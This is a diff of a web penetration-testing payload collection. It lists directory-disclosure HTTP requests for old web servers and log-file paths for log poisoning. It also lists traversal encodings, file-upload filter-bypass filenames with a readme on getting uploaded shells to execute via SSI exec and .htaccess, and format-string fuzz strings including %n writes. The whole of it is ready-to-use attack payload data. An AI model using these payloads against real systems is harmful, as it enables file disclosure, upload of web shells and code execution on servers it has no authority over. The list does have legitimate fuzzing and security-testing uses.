<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Directory Disclosure</span></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> <span
|
||||
class=docemphasis1>Vulnerable Application</span> </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>HTTP Request</span></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Vulnerability Information</span></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire JRun //WEB-INF/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET //WEB-INF/ HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3662" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3662</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire JRun %3f </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /%3f.jsp HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3592" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3592</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Web Server + Mac OS X .DS_Store </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /.DS_Store HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /.<span class=docemphasis1>FBCIndex</span> HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3316" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3316</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Web Server Multiview </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /?M=A HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /?S=D HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3009" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3009</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Web Server Long Slash </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET <span class=docemphasis1><1 to 4096 '/' characters></span>
|
||||
HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2503" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2503</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Web Server/cgi-bin/test-cgi </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /<span class=docemphasis1>cgi</span>-bin/test-cgi?/*
|
||||
HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /<span class=docemphasis1>cgi</span>-bin/test-cgi?*
|
||||
HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2003" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2003</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>BEA WebLogic /%00/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /%00/ HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /%2e/ HTTP/1.0</p>
|
||||
<p class=doctext>3. GET /%2f/ HTTP/1.0</p>
|
||||
<p class=doctext>4. GET /%5c/ HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2513" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2513</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS 5.0 WebDAV </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>SEARCH / HTTP/1.1</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or ip
|
||||
address></span></p>
|
||||
<p class=doctext>Content-Type: text/xml</p>
|
||||
<p class=doctext>Content-Length: 133</p>
|
||||
<p class=doctext><?xml version="1.0"?></p>
|
||||
<p class=doctext><g:searchrequest xmlns:g="DAV:"></p>
|
||||
<p class=doctext><g:sql></p>
|
||||
<p class=doctext>Select "DAV:displayname" from scope()</p>
|
||||
<p class=doctext></g:sql></p>
|
||||
<p class=doctext></g:searchrequest></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1756" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1756</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS 3.0/4.0 BDIR.HTR </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /scripts/iisadmin/bdir.htr??c:\HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2280" target="_blank"><span
|
||||
lang=EN-GB style='color:#003399'>http://www.securityfocus.com/bid/2280</span></a></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Netscape Enterprise Server INDEX </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>INDEX / HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2285" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2285</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Netscape Enterprise Server /?wp-cs-dump </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext><span lang=EN-GB>1. GET /?wp-cs-dump HTTP/1.0</span></p>
|
||||
<p class=doctext><span lang=EN-GB>2. GET /?wp-ver-info HTTP/1.0</span></p>
|
||||
<p class=doctext><span lang=EN-GB>3. GET /?wp-html-rend HTTP/1.0</span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1063" target="_blank"><span
|
||||
lang=EN-GB style='color:#003399'>http://www.securityfocus.com/bid/1063</span></a></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Oracle Internet Application Server /WebDB/admin_/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /WebDB/admin_/ HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2171" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2171</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Oracle 9i Application Server mod_plsql </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext><span lang=EN-GB>GET /pls/sample/admin_/help/..%255</span></p>
|
||||
<p class=doctext><span lang=EN-GB>c<span class=docemphasis1><relative path
|
||||
to file></span> HTTP/1.0</span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3727" target="_blank"><span
|
||||
lang=EN-GB style='color:#003399'>http://www.securityfocus.com/bid/3727</span></a></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<p class=MsoNormal><span lang=EN-GB> </span></p>
|
||||
|
||||
</div>
|
||||
|
||||
<!--504690132--><br></body>
|
||||
|
||||
</html>
|
||||
|
|
@ -0,0 +1,31 @@
|
|||
# based on list by Joseph Giron http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/etc/httpd/logs/acces_log
|
||||
/etc/httpd/logs/acces.log
|
||||
/etc/httpd/logs/error_log
|
||||
/etc/httpd/logs/error.log
|
||||
/var/www/logs/access_log
|
||||
/var/www/logs/access.log
|
||||
/usr/local/apache/logs/access_log
|
||||
/usr/local/apache/logs/access.log
|
||||
/var/log/apache/access_log
|
||||
/var/log/apache2/access_log
|
||||
/var/log/apache/access.log
|
||||
/var/log/apache2/access.log
|
||||
/var/log/access_log
|
||||
/var/log/access.log
|
||||
/var/www/logs/error_log
|
||||
/var/www/logs/error.log
|
||||
/usr/local/apache/logs/error_log
|
||||
/usr/local/apache/logs/error.log
|
||||
/var/log/apache/error_log
|
||||
/var/log/apache2/error_log
|
||||
/var/log/apache/error.log
|
||||
/var/log/apache2/error.log
|
||||
/var/log/error_log
|
||||
/var/log/error.log
|
|
@ -0,0 +1,8 @@
|
|||
# single directory traversals that have caused showcode or command exec issues in the past
|
||||
# GET /path/*payload*relative/path/to/target/file/
|
||||
..%255c
|
||||
.%5c../..%5c
|
||||
/..%c0%9v../
|
||||
/..%c0%af../
|
||||
/..%255c..%255c
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
# known cross platform source Code, file disclosure attack patterns - append after file or dir path
|
||||
%70
|
||||
.%E2%73%70
|
||||
%2e0
|
||||
%2e
|
||||
.
|
||||
\
|
||||
?*
|
||||
%20
|
||||
%00
|
||||
%2f
|
||||
%5c
|
|
@ -0,0 +1,3 @@
|
|||
# microsoft-specific appends - try the generic list, too
|
||||
+.htr
|
||||
::DATA$
|
2
attack-payloads/file-upload/alt-extensions-asp.txt
Normal file
2
attack-payloads/file-upload/alt-extensions-asp.txt
Normal file
|
@ -0,0 +1,2 @@
|
|||
asp
|
||||
aspx
|
|
@ -0,0 +1,4 @@
|
|||
cfm
|
||||
cfml
|
||||
cfc
|
||||
dbm
|
5
attack-payloads/file-upload/alt-extensions-jsp.txt
Normal file
5
attack-payloads/file-upload/alt-extensions-jsp.txt
Normal file
|
@ -0,0 +1,5 @@
|
|||
jsp
|
||||
jspx
|
||||
jsw
|
||||
jsv
|
||||
jspf
|
5
attack-payloads/file-upload/alt-extensions-perl.txt
Normal file
5
attack-payloads/file-upload/alt-extensions-perl.txt
Normal file
|
@ -0,0 +1,5 @@
|
|||
# .pm .lib cannot be called directly, must be called as modules
|
||||
pl
|
||||
pm
|
||||
cgi
|
||||
lib
|
6
attack-payloads/file-upload/alt-extensions-php.txt
Normal file
6
attack-payloads/file-upload/alt-extensions-php.txt
Normal file
|
@ -0,0 +1,6 @@
|
|||
phtml
|
||||
php
|
||||
php3
|
||||
php4
|
||||
php5
|
||||
inc
|
1
attack-payloads/file-upload/alt-extensions.credits.txt
Normal file
1
attack-payloads/file-upload/alt-extensions.credits.txt
Normal file
|
@ -0,0 +1 @@
|
|||
by Joseph Giron
|
|
@ -0,0 +1,9 @@
|
|||
templates_compiled
|
||||
templates_c
|
||||
templates
|
||||
temporary
|
||||
images
|
||||
cache
|
||||
temp
|
||||
files
|
||||
tmp
|
|
@ -0,0 +1,14 @@
|
|||
{ASPSCRIPT}
|
||||
{ASPSCRIPT};
|
||||
{ASPSCRIPT};.jpg
|
||||
{ASPSCRIPT};.pdf
|
||||
{ASPSCRIPT};.html
|
||||
{ASPSCRIPT};.htm
|
||||
{ASPSCRIPT};.txt
|
||||
{ASPSCRIPT};.xyz
|
||||
{ASPSCRIPT};.zip
|
||||
{ASPSCRIPT};.tgz
|
||||
{ASPSCRIPT};.doc
|
||||
{ASPSCRIPT};.docx
|
||||
{ASPSCRIPT};.xls
|
||||
{ASPSCRIPT};.xlsx
|
11
attack-payloads/file-upload/file-ul-filter-bypass-ms-php.txt
Normal file
11
attack-payloads/file-upload/file-ul-filter-bypass-ms-php.txt
Normal file
|
@ -0,0 +1,11 @@
|
|||
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
|
||||
# -----
|
||||
#<?php phpinfo(); ?>
|
||||
#-----
|
||||
{PHPSCRIPT}
|
||||
{PHPSCRIPT}.phtml
|
||||
{PHPSCRIPT}.php.html
|
||||
{PHPSCRIPT}.php::$DATA
|
||||
{PHPSCRIPT}.php.php.rar
|
||||
{PHPSCRIPT}.php.rar
|
||||
{PHPSCRIPT}::$DATA
|
|
@ -0,0 +1,3 @@
|
|||
%00index.html
|
||||
;index.html
|
||||
%00
|
|
@ -0,0 +1,9 @@
|
|||
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
|
||||
# -----
|
||||
# your own payload, or <?php phpinfo(); ?>
|
||||
#-----
|
||||
{PHPSCRIPT}
|
||||
{PHPSCRIPT}.phtml
|
||||
{PHPSCRIPT}.php.html
|
||||
{PHPSCRIPT}.php.php.rar
|
||||
{PHPSCRIPT}.php.rar
|
32
attack-payloads/file-upload/file-ul-filter-bypass.readme
Normal file
32
attack-payloads/file-upload/file-ul-filter-bypass.readme
Normal file
|
@ -0,0 +1,32 @@
|
|||
# File Upload Fuzzfile 1.0 - File Name Filter Bypass
|
||||
# creative commons license http://creativecommons.org/licenses/by/3.0/
|
||||
# see:
|
||||
# http://cwe.mitre.org/data/definitions/434.html
|
||||
|
||||
# projurl
|
||||
|
||||
# For MIME filter bypass, your shellscript should look like
|
||||
# -------
|
||||
# GIF89aP;
|
||||
# [shell]
|
||||
# -------
|
||||
#
|
||||
# Check to see if there are no extension checks at all
|
||||
#
|
||||
# Check to see if the file upload protection is client side only.
|
||||
#
|
||||
# For mod_cgi Server Side Include upload attacks:
|
||||
#<!--#exec cmd="ls" -->
|
||||
#
|
||||
#or, on Windows
|
||||
#
|
||||
#<!--#exec cmd="dir" -->
|
||||
#
|
||||
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
|
||||
# try setting .jpg to executable. If you can set the target directory, try fuzz the
|
||||
# list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
|
||||
#
|
||||
# example .htaccess that sets mime type .jpg to be executable:
|
||||
# -----
|
||||
# AddType application/x-httpd-php .jpg
|
||||
# -----
|
57
attack-payloads/format-strings/format-strings.txt
Normal file
57
attack-payloads/format-strings/format-strings.txt
Normal file
|
@ -0,0 +1,57 @@
|
|||
# derived from fuzz file by Foobar@email.de
|
||||
%s%p%x%d
|
||||
%p%p%p%p
|
||||
%x%x%x%x
|
||||
%d%d%d%d
|
||||
%s%s%s%s
|
||||
%99999999999s
|
||||
%08x
|
||||
%20d
|
||||
%20n
|
||||
%20x
|
||||
%20s
|
||||
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
|
||||
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
|
||||
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
|
||||
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
|
||||
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
|
||||
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
|
||||
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
|
||||
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
|
||||
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
|
||||
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
|
||||
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
|
||||
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
|
||||
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
|
||||
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
|
||||
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
|
||||
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
|
||||
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
|
||||
XXXXX.%p
|
||||
XXXXX`perl -e 'print ".%p" x 80'`
|
||||
`perl -e 'print ".%p" x 80'`%n
|
||||
%08x.%08x.%08x.%08x.%08x\n
|
||||
XXX0_%08x.%08x.%08x.%08x.%08x\n
|
||||
%.16705u%2\$hn
|
||||
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
|
||||
AAAAA%c
|
||||
AAAAA%d
|
||||
AAAAA%e
|
||||
AAAAA%f
|
||||
AAAAA%I
|
||||
AAAAA%o
|
||||
AAAAA%p
|
||||
AAAAA%s
|
||||
AAAAA%x
|
||||
AAAAA%n
|
||||
ppppp%c
|
||||
ppppp%d
|
||||
ppppp%e
|
||||
ppppp%f
|
||||
ppppp%I
|
||||
ppppp%o
|
||||
ppppp%p
|
||||
ppppp%s
|
||||
ppppp%x
|
||||
ppppp%n
|
||||
|
467
attack-payloads/http-protocol/docs.http-method-defs.html
Normal file
467
attack-payloads/http-protocol/docs.http-method-defs.html
Normal file
|
@ -0,0 +1,467 @@
|
|||
<html>
|
||||
|
||||
<head>
|
||||
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
|
||||
<meta name=Generator content="Microsoft Word 10 (filtered)">
|
||||
<title>HTTP/1.1 and HTTP/1.0 Method and Field Definitions</title>
|
||||
|
||||
<style>
|
||||
<!--
|
||||
/* Style Definitions */
|
||||
p.MsoNormal, li.MsoNormal, div.MsoNormal
|
||||
{margin:0cm;
|
||||
margin-bottom:.0001pt;
|
||||
font-size:12.0pt;
|
||||
font-family:"Times New Roman";}
|
||||
h2
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:18.0pt;
|
||||
font-family:"Times New Roman";
|
||||
color:#354278;
|
||||
font-weight:bold;}
|
||||
h5
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:10.0pt;
|
||||
font-family:"Times New Roman";
|
||||
color:#354278;
|
||||
font-weight:bold;}
|
||||
a:link, span.MsoHyperlink
|
||||
{color:blue;
|
||||
text-decoration:underline;}
|
||||
a:visited, span.MsoHyperlinkFollowed
|
||||
{color:purple;
|
||||
text-decoration:underline;}
|
||||
p
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:12.0pt;
|
||||
font-family:"Times New Roman";}
|
||||
p.doctext, li.doctext, div.doctext
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:10.5pt;
|
||||
font-family:"Times New Roman";
|
||||
color:black;}
|
||||
span.docemphasis1
|
||||
{font-style:italic;}
|
||||
@page Section1
|
||||
{size:595.3pt 841.9pt;
|
||||
margin:3.0cm 2.0cm 3.0cm 2.0cm;}
|
||||
div.Section1
|
||||
{page:Section1;}
|
||||
-->
|
||||
</style>
|
||||
|
||||
</head>
|
||||
|
||||
<body lang=DA link=blue vlink=purple>
|
||||
|
||||
<div class=Section1>
|
||||
|
||||
|
||||
<p class=doctext>These tables contain a nearly complete list of all the
|
||||
methods, requests, and header fields of typical HTTP/1.0 and HTTP/1.1 requests
|
||||
and responses.</p>
|
||||
|
||||
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
|
||||
style='width:100.0%'>
|
||||
<tr>
|
||||
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
|
||||
<h5 align=center style='text-align:center'><a name=app02table01></a><span
|
||||
style='font-size:10.5pt;font-family:Arial'> HTTP/1.1 Methods and
|
||||
Field Definitions</span></h5>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Method</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Request</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Definition</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>GET <span class=docemphasis1><Request-URI>?query_string</span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n\r\</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>The GET method is used to retrieve whatever is stored or produced
|
||||
by the resource located at the specified Request-URI. The GET method can be
|
||||
used to request files, to invoke server-side scripts, to interact with
|
||||
server-side CGI programs, and more. When HTML form variables are submitted
|
||||
with the form action set to GET, the form parameters are encoded in a query
|
||||
string and submitted to the HTTP server as part of the Request-URI using the
|
||||
GET request method.</p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>POST </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>POST <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
